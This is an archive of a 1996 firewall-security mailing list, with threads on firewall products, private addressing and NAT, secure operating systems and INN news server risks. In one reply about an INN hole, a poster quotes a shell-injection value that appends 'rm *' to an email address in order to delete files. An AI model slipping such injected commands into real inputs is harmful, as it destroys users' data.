1996 08:01:16 -0800 (PST) Received: from deserthosp.org ([192.251.121.175]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA26393; Wed, 14 Feb 1996 08:01:09 -0800 (PST) From: CWSTAFFORD@deserthosp.org Received: from WPDOMAIN-Message_Server by deserthosp.org with WordPerfect_Office; Wed, 14 Feb 1996 07:59:52 -0800 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Wed, 14 Feb 1996 07:59:36 -0800 To: firewalls-digest@GreatCircle.COM, firewalls-digest-owner@GreatCircle.COM Subject: Firewalls-Digest V5 #97 -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for a firewall product. I want to provide a web server to the Internet. I also want to protect my lan network. What is the quickest most cost effective method to perform this? Are there shareware products on the market? Thank you for any info you can provide. -Chris From firewalls-owner Wed Feb 14 08:49:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA26510 for firewalls-outgoing; Wed, 14 Feb 1996 08:06:23 -0800 (PST) Received: from athena.bournemouth.ac.uk (athena.bournemouth.ac.uk [194.66.72.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA26440 for ; Wed, 14 Feb 1996 08:04:06 -0800 (PST) Received: by athena.bournemouth.ac.uk (8.6.11/8.6.11) with SMTP id QAA18480 for ; Wed, 14 Feb 1996 16:02:34 GMT Date: Wed, 14 Feb 1996 16:02:34 GMT Message-Id: <199602141602.QAA18480@athena.bournemouth.ac.uk> X-Sender: jjury@athena.bournemouth.ac.uk X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: jjury@bournemouth.ac.uk (James Jury) Subject: Request from a student Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am a student of Bournemouth University in the UK, and I am writing a research paper on whether there is a correlation between an organisation type and the type of firewall solution chosen to protect it. Anybody wishing to help me can, by sending me details of what type of organisation you represent and which of the following type of firewall your organisation uses, and the main reason why it was chosen : Screening Router; Unix Based; Application Level or otherwise state. I understand that it would be unwise to disclose the exact details of yourfirewall, which is why the clasifications are so broad. I thank you in advance for reading this and considering to help. From firewalls-owner Wed Feb 14 09:24:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA28577 for firewalls-outgoing; Wed, 14 Feb 1996 09:14:15 -0800 (PST) Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.108]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA28572 for ; Wed, 14 Feb 1996 09:14:05 -0800 (PST) Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id aw01916; 13 Feb 96 21:24 GMT Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-3.mail.demon.net id ac26791; 13 Feb 96 21:21 GMT From: Les Carleton To: firewalls@greatcircle.com Subject: The Secure Operating Systems Question Date: Tue, 13 Feb 1996 13:21:35 GMT Organization: The Doghouse Reply-To: les@tracker.demon.co.uk Message-Id: <31208d38.900440@158.152.1.72> X-Mailer: Forte Agent .99d/16.182 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi folks, I've recently had customers coming up more and more with the "Secured operating system" question. That is ... what is the benefit of having a specially secured operating system on a machine which no one is going to be logging in to? Now, I have my own opinions on this one, but i'd like a more general view from the list (if one exists). I'm not in the business of starting a holy war, so i'd kindof like facts only please. Now I have a few conditions i'd like to put on the firewall host in question. 1) It sits between the internet and an internal network and all traffic goes through it. 2) Its an application gateway (like fwtk, gauntlet, raptor, etc). There is no packet routing going on. 3) There are no login users (except root who's access is controlled by a securid card or other secure password scheme). 4) The only network ports enabled are pointed at proxy daemons. 5) The firewall is physically secure. The question is ... Is there any benefit in having an MLS or specially secured operating system on the host or will a standard opsys meeting these criteria do? Like I said, I have my own opinions, but i'm going to reserve them for now, i'd welcome the opinion of the list. Thanks! ...Les... "Seeing if his logic is correct :-)" +-----------------------------------------------+ | Les Carleton Firewalling Consultant / "The Software Lifeguard" | These are my views ... not my employer's / les@tracker.demon.co.uk | / +-------------------------------------------+ "Open Standards ... Free Software ... Live Free or Fry!" From firewalls-owner Wed Feb 14 09:44:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA28595 for firewalls-outgoing; Wed, 14 Feb 1996 09:14:34 -0800 (PST) Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA28580 for ; Wed, 14 Feb 1996 09:14:26 -0800 (PST) Received: from cohiba (golda@cohiba [204.243.240.5]) by cohiba.predictive.com (8.6.12/8.6.12) with SMTP id LAA01932 for ; Wed, 14 Feb 1996 11:42:47 -0500 Date: Wed, 14 Feb 1996 11:42:45 -0500 (EST) From: Rachel Rosencrantz X-Sender: golda@cohiba To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #45 In-Reply-To: <199601201127.DAA18667@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Michael Ryan > Date: Fri, 19 Jan 1996 10:29:54 GMT > Subject: Perimeter net and official net addresses > > Hi folks, > > I've been tuned into this list for a few months now and here's my first > posting. > > I'm attaching to the Internet for the first time. If I set up a perimeter > network between my internal net and the Internet, the way I see it, > I have three choices. > > .....first two options deleted..... > > (c) Use a Class C address on the perimeter net and a private IP address > on the internal net (c.f. RFC1597). > My problems with this are: > (1) Any expert whose opinion I've read says keep away from using > private addresses. > (2) Direct connections are not possible between the inside and the > outside; proxying or NAT must be used always. > However, I see advantages to this scheme also: > (1) If proxying is used to give insiders access to the outside, then, > it's not possible for a bad guy on the outside to mount an > IP address spoofing or source routing attack, as by the rules of > RFC1597, my ISP must filter out private addresses from going through > their routers (I realise there's an element of trust on my part for my > ISP here). > (2) It overcomes the disadvantages of (a) and (b) above. > > Now I won't claim to be an expert, but I would go with option 3. If the inside addresses are private (or "illegal") addresses there are fewer means to figure out what IP addresses your inside machines have. (Ok, that is security through obscurity, but if you aren't using it as your sole means of security its ok.) Secondly, I know Raptor, and I believe other firewall vendors do do mapping of illegal IP addresses to the unused addresses at the 10.0... range, so going out on the net doesn't pose a problem if you chose the same set of IP's that IBM is using. Also there are the advantages of not having to get 2 sets of numbers or subnetting a class C. -Rachel From firewalls-owner Wed Feb 14 10:01:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA29611 for firewalls-outgoing; Wed, 14 Feb 1996 09:42:45 -0800 (PST) Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.108]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA29599 for ; Wed, 14 Feb 1996 09:42:29 -0800 (PST) Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ai05641; 13 Feb 96 21:58 GMT Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-3.mail.demon.net id aa06247; 13 Feb 96 21:49 GMT From: Les Carleton To: firewalls@greatcircle.com Subject: Re: The Secure Operating Systems Question Date: Tue, 13 Feb 1996 13:49:12 GMT Organization: The Doghouse Reply-To: les@tracker.demon.co.uk Message-Id: <312096a9.3316591@158.152.1.72> X-Mailer: Forte Agent .99d/16.182 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Oh ... I forgot to mention ... 6) The proxy daemon code does not contain any calls to exec or system ...Les... +-----------------------------------------------+ | Les Carleton Firewalling Consultant / "The Software Lifeguard" | These are my views ... not my employer's / les@tracker.demon.co.uk | / +-------------------------------------------+ "Open Standards ... Free Software ... Live Free or Fry!" From firewalls-owner Wed Feb 14 10:58:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00348 for firewalls-outgoing; Wed, 14 Feb 1996 09:58:15 -0800 (PST) Received: from mimesweeper.integralis.co.uk (mimesweeper.integralis.co.uk [193.122.60.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA00343 for ; Wed, 14 Feb 1996 09:58:02 -0800 (PST) From: Pascal.Trouvin@integralis.co.uk Received: from integd.integralis.co.uk (193.128.143.14) by mimesweeper.integralis.co.uk (0.44) with Integralis_SMTPRS id ; Wed, 14 Feb 1996 17:55:17 +0000 Received: from ccgate.integralis.co.uk by INTEGD.INTEGRALIS.CO.UK (PMDF V4.3-10 #8244) id <01I17NGVW374000I87@INTEGD.INTEGRALIS.CO.UK>; Wed, 14 Feb 1996 17:54:59 +0000 (GMT) Date: Wed, 14 Feb 1996 18:00 +0000 (GMT) Subject: Re: Firewall-1 Version Comparison To: gjose@mecx05.colesmyer.com.au, firewalls@GreatCircle.COM Message-id: <01I17NHGHOQI000I87@INTEGD.INTEGRALIS.CO.UK> X-Envelope-to: firewalls@GreatCircle.COM, gjose@mecx05.colesmyer.com.au MIME-version: 1.0 Content-type: MULTIPART/MIXED; BOUNDARY="Boundary (ID P+f6dtuARhfJhf/XvYjPEg)" Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --Boundary (ID P+f6dtuARhfJhf/XvYjPEg) Content-type: APPLICATION/OCTET-STREAM Content-transfer-encoding: BASE64 SGFzIGFueWJvZHkgaGFkIGV4cGVyaWVuY2Ugd2l0aCBib3RoIHZlcnNpb24gMSBh bmQgMiBvZiB0aGUgRmlyZXdhbGwtMSBzb2Z0d2FyZT8gDQpJIGFtIGludGVyZXN0 ZWQgaW4gYSBmdW5jdGlvbmFsIGNvbXBhcmlzb24gb2YgdGhlIHZlcnNpb25zLCBh bmQgYWxzbyBpbiBrbm93aW5nIA0Kd2hldGhlciB0aGVyZSBhcmUgb3RoZXIgY29y cG9yYXRlIHNpdGVzIGN1cnJlbnRseSB1c2luZyB2ZXJzaW9uIDIuDQoNClRoYW5r cywNCg0KR3JhaGFtDQotLSANCkdyYWhhbSBKb3NlLCBUZWNobmljYWwgQW5hbHlz dCwgSW5mb3JtYXRpb24gU3lzdGVtcyBTZWN1cml0eQ0KUmV0YWlsIFRlY2hub2xv Z3kgU2VydmljZXMsIENvbGVzIE15ZXIgTGltaXRlZCAoQXVzdHJhbGlhKQ0KVm9p Y2U6ICs2MTMgOTQ4MyA3NjEzCUVtYWlsOiBnam9zZUBtZWN4MDUuY29sZXNteWVy LmNvbS5hdQ0KDQo= --Boundary (ID P+f6dtuARhfJhf/XvYjPEg) Content-type: TEXT/PLAIN Firewall-1 from checkpoint version 1 had only filtering capabilities version 2 implements some users identification/authentification schemes, address translation regards pascal.trouvin@integralis.co.uk --Boundary (ID P+f6dtuARhfJhf/XvYjPEg)-- From firewalls-owner Wed Feb 14 11:11:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02325 for firewalls-outgoing; Wed, 14 Feb 1996 10:59:33 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA02310 for ; Wed, 14 Feb 1996 10:59:27 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id NAA24227; Wed, 14 Feb 1996 13:58:45 -0500 Date: Wed, 14 Feb 1996 13:58:45 -0500 From: Chris Eastman Subject: tcpdump modifications To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was told recently that there are several modifications to tcpdump floating around out there, primarily one that is packaged with a 'video' utility that will take captured packets and replay them according to time stamp information (real time playback). Does anyone know of where one might come up with these modifications and/or additional filters? I checked ftp.ee.lbl.gov, and the only thing they support is the standard tcpdump release. Thanks in advance, --chris %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Wed Feb 14 11:28:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00896 for firewalls-outgoing; Wed, 14 Feb 1996 10:12:22 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA00880 for ; Wed, 14 Feb 1996 10:12:12 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA11605; Wed, 14 Feb 96 12:13:51 CST Received: by mnbp.network.com with Microsoft Mail id <3122252D@mnbp.network.com>; Wed, 14 Feb 96 12:08:45 CST From: Michael Brown To: jeromie Cc: firewalls , sengle Subject: RE: Gauntlet 3.1 Packet Filter? Date: Wed, 14 Feb 96 12:08:00 CST Message-Id: <3122252D@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Glad to hear you're familiar with BorderGuards. There were some new additions and new brochures in the last few months. The latest is a picture of a black BorderGuard with a fold out and more detailed than the last one. I am not too technical, so here is what proxies I understand it supports. If you're on the technical side, you probably have a better understanding of the proxies and what someone may need in addition to these if they get creative. BorderGuard supports: Telnet, FTP, SMTP, NNTP, and gopher. Keep in mind, the cost of this product and what you can do with it. If the customer needs to get real creative on firewall access, then they may need to spend $10K - 50K for a belt/suspenders approach firewall. In that case the BorderGuard is still the best choice for the access device because of the superior packet filter design and the Secure VPN access. The price for all this stuff in the BorderGuard is less than a small router from someone like Bay or cisco. My understanding of Gauntlet(please help me out and correct me) is the proxies it supports are: Telnet, FTP, SMTP, NNTP, HTTP,X11 ,and gopher. The NSC product is not directly competing for internet firewall business, but more for Secure VPN applications over the INternet, Frame Relay, SMDS, any public based network you need to ensure your traffic is kept confidential. The BorderGuard is nice because when someone wants an internet connection, to block intruders, but allow email, allow employees access to cruise the net,block times the employees can cruise the net, and allow the admin to block out porno and undesirable web pages. BorderGuard can do that without the added cost of the separate firewall. To get started on the Internet this is a secure inexpensive design. When they start to get real creative with access they can go back and add the separate firewall if they need too. All in all, the BorderGuard is 'way cool'. Best Regards, mkb ---------- Uhhuh... I thought we were talking about the BorderGuard product. I am familar with the product, as we have purchased & installed them before for a client. They are basically a router with an encryption engine in it. I would agree with you that the product has good throughput, from what we've seen. As for being an 'application gateway' it's not, unless you changed it in the last 2 months. Basically it uses packet filtering for access control, can do encryption to create VPN's, and also w/ the DPF facility can look @ bytes @ given offsets within the packets. This does NOT constitute an application level gateway. Where are your proxies? (Don't tell me they are in the firmware. Jeromie Jackson Garrison technologies jeromie@garrison.com From firewalls-owner Wed Feb 14 11:39:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00186 for firewalls-outgoing; Wed, 14 Feb 1996 09:54:51 -0800 (PST) Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA00173 for ; Wed, 14 Feb 1996 09:54:42 -0800 (PST) Received: from maestro.Maestro.COM by relay7.UU.NET with SMTP id QQacxj06154; Wed, 14 Feb 1996 12:53:43 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA23724; Wed, 14 Feb 96 12:41:36 EST Date: Wed, 14 Feb 1996 12:41:35 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: RE: PC Magazine article on firewalls In-Reply-To: <01BAFABB.6D191A60@niatross.fonorola.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> The March 12, 1996 edition of PC Magazine (Ziff-Davis Publishing) has an > > I'm confused. Do you mean March 12, *1995* ? No, I mean 1996. Us Dawgs is good at reading ahead on account of our habit of sniffing around. SP, tCED cDm From firewalls-owner Wed Feb 14 11:55:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA01940 for firewalls-outgoing; Wed, 14 Feb 1996 10:49:17 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA01935 for ; Wed, 14 Feb 1996 10:49:08 -0800 (PST) Received: from grouper.mkt.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA19973; Wed, 14 Feb 96 13:48:26 -0500 Received: from cheshire by grouper.mkt.csd.harris.com (5.61/HARRIS-4.0) id AA13339; Wed, 14 Feb 96 13:48:25 -0500 Message-Id: <3121F12F.585@mail.hcsc.com> Date: Wed, 14 Feb 1996 09:26:55 -0500 From: William C Curtiss Organization: Harris Computer Systems Corporation X-Mailer: Mozilla 2.0b5 (Win95; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Re: Harris Computer product viability. References: <960212141736_142186765@emout04.mail.aol.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk MFTemplar@aol.com wrote: > > Hey, > > I was wondering what the participants in this group thought of Harris > Computer's Cyberguard Firewall product. ... > The November Data Comm Firewall test rated Harris's product # 2 (CheckPoint's > was # 1) but the people at Raptor and Secure Computing say they don't run > into Harris at all in the commercial market. Well, we've certainly run into them -- maybe they just aren't keeping track as well as we are :-). > Is there any non-governmental/commercial adoption of the Harris Computer > Cyberguard product that you know of out in the field and how has it gone? I just went down our customer list, and about 80 percent of the CyberGuard Firewall customers are commercial. Rather than list reference customers and magazine reviews now, I too would like to hear the experiences of others on this list. (If you want immediate input drop some email, or give a call, and I will put you in touch with some commercial reference customers.) From firewalls-owner Wed Feb 14 12:54:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06641 for firewalls-outgoing; Wed, 14 Feb 1996 12:51:57 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA06625; Wed, 14 Feb 1996 12:51:46 -0800 (PST) Received: from radisys.radisys.com by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id RAA24767; Sun, 11 Feb 1996 17:44:42 -0500 Received: from msmail.radisys.com by radisys.radisys.com id aa11165; 14 Feb 96 12:50 PST Received: by msmail.radisys.com with Microsoft Mail id <31224B01@msmail.radisys.com>; Wed, 14 Feb 96 12:50:09 PST From: Jesse Gambetti To: firewalls-owner , firewalls Subject: Private FTP / Mail Date: Wed, 14 Feb 96 12:49:00 PST Message-ID: <31224B01@msmail.radisys.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm interested in what security risks a private FTP server for our employees and sending MS Mail via internet might present. As far as the FTP server we would need to set it up in a way that our employees could copy files onto it just as if it were a netware drive. Which might mean running NFS on the servers. From firewalls-owner Wed Feb 14 13:25:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06719 for firewalls-outgoing; Wed, 14 Feb 1996 12:54:17 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA06714 for ; Wed, 14 Feb 1996 12:54:14 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id PAA05725; Wed, 14 Feb 1996 15:52:40 -0500 Date: Wed, 14 Feb 1996 15:52:40 -0500 (EST) From: Brain21 To: firewalls@greatcircle.com Subject: Network diagramming tool Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A while back someone asked about a network diagraming tool. I was browsing through some mags and found this thing called NetVis. It looks pretty cool and supports such things as 500 symbols, etc., concurrent file access, Program launching and embedding, data import & more. A working demo is available from www.quyen.com/netviz I have not tried it yet, and no, I do not work for them or anything. Brain21 From firewalls-owner Wed Feb 14 13:26:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA07608 for firewalls-outgoing; Wed, 14 Feb 1996 13:21:13 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA07585 for ; Wed, 14 Feb 1996 13:21:03 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id NAA13824; Wed, 14 Feb 1996 13:13:10 -0800 (PST) Message-Id: <199602142113.NAA13824@count04.mry.scruznet.com> To: Rachel Rosencrantz cc: Firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Firewalls-Digest V5 #45 In-reply-to: Your message of "Wed, 14 Feb 1996 11:42:45 EST." Date: Wed, 14 Feb 1996 13:13:09 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content type: application/x-pgp -----BEGIN PGP SIGNED MESSAGE----- actually I have a different take on this one for ip_filter version 3.02 or above with IPNAT or the Sunscreen SPF-100 with network vectoring :)(effectively the same thing although the protocol layers between the 2 are radically different..) I usuallly create a firewall complex of machines I like to translate the DMZ net to one set of private addresses and to translate the DMZ addresses to a 2nd set of private addresses for the internal network to do this safely the NAT must happen on packet inbound processing AND the machine has to live inside of its own filters. By using sets of addresses guaranteed(hah!) to NOT route(RFC1597) over the backbone (and you had better test your ISP's routers to make sure that they wont route this traffic if this characteristic holds true it becomes necessary to attack the closest upstream router from your site to try and forge packets for your internal nets. This and encrypted encapsulation protocols can be used to great advantage if one only accepts inbound traffic (encrypted) from only hosts that the key is known for. cheers kelly -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMSJQKbl+rkbO5CVtAQFZuAf/WkW2NBYUshc0IkyQ54yGJ9BdoqaxnRsE v5WosR9u/QSmqvokXYtNYDIpJL7l4pVU/yH6iWRaH0RtpsqTuZQ64sfNPBPrGH3s 7GsBRLxwFjR75yZi3hBznU+S5NpvlrNgiW4UaWSDiC5bdycASTvhJBBt5lBgtn8g GYUQy9UpJDTbLNPY4RlmLc2er/wGH5tkwZ2UVikADOBecXooPsdWj7CTK24lhjsp G6/9hL2JLenfUmMF2JK2tGC8TM0eiQ4grriEB4TCAOd6mwncaqe87y/b0N4Q/OcF e0p5g7EIuTpqInadbiKkJcBV3oVRhFHyimpVpISiNQULvumBibU09Q== =MDG1 -----END PGP SIGNATURE----- # From firewalls-owner Wed Feb 14 14:09:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08514 for firewalls-outgoing; Wed, 14 Feb 1996 13:48:11 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA08509 for ; Wed, 14 Feb 1996 13:48:07 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id QAA20838; Wed, 14 Feb 1996 16:47:23 -0500 (EST) From: Jeff Murphy Message-Id: <199602142147.QAA20838@smurfland.cit.buffalo.edu> Subject: Re: Web browser ports? To: legg@sun1plus.liebert.com (Jim Legg) Date: Wed, 14 Feb 1996 16:47:23 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9602141457.AA29252@sun1plus.liebert.com> from "Jim Legg" at Feb 14, 96 09:57:09 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> >Volume 3 of Stevens? What is this one about, has it been out for long? >>> Copyright 1993. >> >>Uhmm... Volume 1 of Stevens did not come out until 1994. Volume 2 was >>released in 1995. Are you perhaps thinking of Comer "Internetworking >>with TCP/IP" [3 volumes] rather than Stevens "TCP/IP Illustrated" [only >>2 that I know of]? Perhaps you mean some other Stevens? What is the >>title? http://www.aw.com/cp/ TCP/IP Illustrated, Volume 3: TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols, by W. Richard Stevens <> From firewalls-owner Wed Feb 14 14:18:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08980 for firewalls-outgoing; Wed, 14 Feb 1996 13:55:24 -0800 (PST) Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA08975 for ; Wed, 14 Feb 1996 13:55:19 -0800 (PST) Received: from fred.digex.net (fred.digex.net [164.109.213.78]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id QAA20714; Wed, 14 Feb 1996 16:54:31 -0500 Message-ID: <31225982.292@access.digex.net> Date: Wed, 14 Feb 1996 16:52:02 -0500 From: "Eliot T. Ware" X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: sikpuppy@maestro.com CC: Firewall ListServer Subject: Re: Need a few pointers References: <9601141357.AA04878@tidtest.total.fr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michel Lavondes wrote: > > In message , Sick Puppy writes: > > There was a very good response to my query. I had no idea there were > > so many security problems and performance problems associated with > > WindBlows 95. Sounds like the operating system was written by a couple > > of drunken cats. In a couple of days I will get the responses together > > in one file, together with a couple of good web pointers, and pass it on > > to anyone who wants an e-mailed copy. > > > > Sick Puppy, the Cat_Eating_Dawg > > Either you didn't get to post it or (more likely) I was careless > with the delete button :-(. Could you send me a copy ? > > advTHANKSance > > Michel Lavondes (lavondes@tidtest.total.fr) > #include > ** CDA warning : don't read this if you're under 18 ** > Don't whistle while you piss > Hagbard Celine I'd also like a copy if possible. Thanks. -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Wed Feb 14 14:19:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08160 for firewalls-outgoing; Wed, 14 Feb 1996 13:38:35 -0800 (PST) Received: from ncar.UCAR.EDU (ncar.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA08153 for ; Wed, 14 Feb 1996 13:38:28 -0800 (PST) Message-Id: <199602142137.OAA21824@ncar.ucar.EDU> Received: by ncar.ucar.EDU (NCAR Local/ NCAR Central Post Office 03/11/93) id OAA21824; Wed, 14 Feb 1996 14:37:47 -0700 (MST) Subject: Re: INN/NNTP Security Implications To: surguine@csn.net (Scott Surguine) Date: Wed, 14 Feb 96 14:37:46 MST Cc: firewalls@GreatCircle.COM, surguine@teal.csn.net In-Reply-To: <199602140045.RAA09593@teal.csn.net>; from "Scott Surguine" at Feb 13, 96 5:45 pm From: woods@ncar.ucar.edu (Greg Woods) X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have a few questions regarding Security Concerns and INN/NNTP Since no one else more expert has volunteered yet, I'll take a stab at it. > What Are the security implications of allowing traffic accross port 119 > for accessing ( reading, posting, etc ... ) to our "private" newsgroups on > our Newsserver? The following answers should all be prefaced with "assuming no bugs in INN". It goes without saying that if the service is exposed to the outside world, if it has security holes, those holes can be exploited. I don't know of any security holes in INN that would allow access beyond the news system. > If I do not configure my site to obtain newsfeeds from outside our site, > Can someone still spoof feeds to my site? Depends on how your "newsfeeds" file is set up. If you allow any machines at all to feed news to your server, then someone on the outside who controls a DNS server can configure the DNS server to return one of these names when its IP address is queried, and then theoretically send news to your server from there. Same applies to reading and posting privileges, although I know that you can beat this one for reading and posting by specifying those privileges in the nnrp.access file by IP address only. Then you're only vulnerable if someone on the outside can actually launch an IP address spoofing attack, which can be blocked at the external router by refusing any packets that come in to your external interface with an internal source address (most likely you want to be doing that anyway). > Does anyone know of specific security related issues reagarding INN? I am > configuring INN1.4sec, which is a "security" patch to INN1.4. Can someone > explain what hole INN1.4sec patches? It was one of those things where a shell script did something like /usr/ucb/Mail $address_obtained_from_news_article Implications of that are obvious (just slip in an address like "user@host.domain; rm *" and see what happens) > Are there any known methods by which "Automatic Group Creation" can take > place in INN? Yes. This is controlled in the control.ctl file. It should be possible to configure it not to do any auto newgroups if that's what you want. --Greg From firewalls-owner Wed Feb 14 14:21:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08401 for firewalls-outgoing; Wed, 14 Feb 1996 13:44:50 -0800 (PST) Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA08388 for ; Wed, 14 Feb 1996 13:44:41 -0800 (PST) Received: from cohiba (golda@cohiba [204.243.240.5]) by cohiba.predictive.com (8.6.12/8.6.12) with SMTP id QAA00892 for ; Wed, 14 Feb 1996 16:48:23 -0500 Date: Wed, 14 Feb 1996 16:48:22 -0500 (EST) From: Rachel Rosencrantz X-Sender: golda@cohiba To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #75 In-Reply-To: 